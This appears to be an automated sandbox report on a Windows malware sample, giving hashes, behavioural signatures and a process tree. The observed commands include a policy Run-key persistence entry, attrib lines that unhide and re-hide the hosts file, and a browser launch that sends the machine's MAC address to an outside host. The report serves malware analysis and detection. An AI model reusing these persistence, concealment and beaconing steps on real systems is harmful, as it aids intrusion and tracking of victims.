Analysis
  max time kernel: 150s
  max time network: 126s
  platform: windows10-2004_x64
  resource: win10v2004-20240802-en
  resource tags: arch:x64, arch:x86, image:win10v2004-20240802-en, locale:en-us, os:windows10-2004-x64, system
  submitted: 23/08/2024, 22:13
Static task: static1
Behavioral task: behavioral1
  Sample: bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe
  Resource: win7-20240708-en
Behavioral task: behavioral2
  Sample: bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe
  Resource: win10v2004-20240802-en
General
  Target: bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe
  Size: 46KB
  MD5: bd5ca4e52639067d28151719615b587d
  SHA1: 51718e6feef6d23a9b00536a28c9a4e259a7f45a
  SHA256: 83a2cd295660aa9acc296769b4af8607cc6ad9c37d16fe303590041e1ac31613
  SHA512: 87eae489684b9f470a27bf6a604df4966ca3e57f2392718b2504a63c29ba6aae9cf58ae166976ff3b15d7d892902f2d796b02c3f8ee806f4d765c0a53e8feb27
  SSDEEP: 768:oK7vMVvp3w/qUfsRd9Zsb5CDsaSur5dikXBgOHtg8mVD2wVyl3qU5dM9KRxXH5Y:HvMVvp3w/hcG5esaSur5AyH7q5VMp5dA
Malware Config
Signatures

Adds policy Run key to start application (2 TTPs, 2 IoCs)
  description | ioc | process
  Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run | bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe
  Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\run\qq10000 = "C:\\Users\\Admin\\AppData\\Local\\Temp\\bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe" | bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe
Drops file in Drivers directory (1 IoCs)
  description | ioc | process
  File opened for modification | C:\Windows\system32\drivers\etc\hosts | bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe
Sets file to hidden (1 TTPs, 1 IoCs)
  Modifies file attributes to stop it showing in Explorer etc.
  pid | process
  2676 | attrib.exe
Drops file in Windows directory (1 IoCs)
  description | ioc | process
  File opened for modification | C:\Windows\win.ini | bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe
System Location Discovery: System Language Discovery (1 TTPs, 4 IoCs)
  Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
  description | ioc | process
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | attrib.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | attrib.exe
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | IEXPLORE.EXE
  Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses (4 IoCs)
  pid | process
  4488 | bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe (repeated 4 times)
Suspicious use of AdjustPrivilegeToken (2 IoCs)
  description | pid | process
  Token: 33 | 4744 | AUDIODG.EXE
  Token: SeIncBasePriorityPrivilege | 4744 | AUDIODG.EXE
Suspicious use of FindShellTrayWindow (64 IoCs)
  pid | process
  4792 | iexplore.exe
  4488 | bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe (repeated 63 times)
Suspicious use of SendNotifyMessage (64 IoCs)
  pid | process
  4488 | bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe (repeated 64 times)
Suspicious use of SetWindowsHookEx (6 IoCs)
  pid | process
  4792 | iexplore.exe (repeated 2 times)
  4888 | IEXPLORE.EXE (repeated 4 times)
Suspicious use of WriteProcessMemory (13 IoCs)
  description | pid | process | procid_target
  PID 4488 wrote to memory of 2316 | 4488 | bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe | 87
  PID 4488 wrote to memory of 2316 | 4488 | bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe | 87
  PID 4488 wrote to memory of 2316 | 4488 | bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe | 87
  PID 4488 wrote to memory of 2676 | 4488 | bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe | 94
  PID 4488 wrote to memory of 2676 | 4488 | bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe | 94
  PID 4488 wrote to memory of 2676 | 4488 | bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe | 94
  PID 4488 wrote to memory of 4792 | 4488 | bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe | 99
  PID 4488 wrote to memory of 4792 | 4488 | bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe | 99
  PID 4792 wrote to memory of 4888 | 4792 | iexplore.exe | 100
  PID 4792 wrote to memory of 4888 | 4792 | iexplore.exe | 100
  PID 4792 wrote to memory of 4888 | 4792 | iexplore.exe | 100
  PID 4488 wrote to memory of 3424 | 4488 | bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe | 56
  PID 4488 wrote to memory of 3424 | 4488 | bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe | 56
Views/modifies file attributes (1 TTPs, 2 IoCs)
  pid | process
  2316 | attrib.exe
  2676 | attrib.exe
Processes

C:\Windows\Explorer.EXE (PID 3424)
  command line: C:\Windows\Explorer.EXE

  C:\Users\Admin\AppData\Local\Temp\bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe (PID 4488)
    command line: "C:\Users\Admin\AppData\Local\Temp\bd5ca4e52639067d28151719615b587d_JaffaCakes118.exe"
    - Adds policy Run key to start application
    - Drops file in Drivers directory
    - Drops file in Windows directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    - Suspicious use of WriteProcessMemory

    C:\Windows\SysWOW64\attrib.exe (PID 2316)
      command line: attrib -s -h "C:\Windows\system32\drivers\etc\hosts"
      - System Location Discovery: System Language Discovery
      - Views/modifies file attributes

    C:\Windows\SysWOW64\attrib.exe (PID 2676)
      command line: attrib +s +h "C:\Windows\system32\drivers\etc\hosts"
      - Sets file to hidden
      - System Location Discovery: System Language Discovery
      - Views/modifies file attributes

    C:\program files\internet explorer\iexplore.exe (PID 4792)
      command line: "C:\program files\internet explorer\iexplore.exe" "http://www.dnbqq.cn/234/install.asp?ver=090107&tgid=baizi&address=72-21-D8-03-26-30&regk=1&flag=5ddf4dd11a496f259ee0319567740e7c&frandom=4346"
      - Modifies Internet Explorer settings
      - Suspicious use of FindShellTrayWindow
      - Suspicious use of SetWindowsHookEx
      - Suspicious use of WriteProcessMemory

      C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE (PID 4888)
        command line: "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:4792 CREDAT:17410 /prefetch:2
        - System Location Discovery: System Language Discovery
        - Modifies Internet Explorer settings
        - Suspicious use of SetWindowsHookEx

C:\Windows\system32\AUDIODG.EXE (PID 4744)
  command line: C:\Windows\system32\AUDIODG.EXE 0x2f4 0x310
  - Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v15
Downloads

  Filesize: 16KB
  MD5: 6d49c5734c3f3237b72e9bc69321c556
  SHA1: 6ece8bcad7986bc237c5b492d79eda599f02265b
  SHA256: 5a1f0259386398409ec2ea8da1b4bda2770e57215f17fa4622afb5abd10e683e
  SHA512: f948a2e86b51597cdcaa3e4e71eb07b58f09a455561ba232bcf9b85f7ef3354647a4609334e2a8ec4fc40ec825330e551ed922f46b926354f4746a01fa7c148e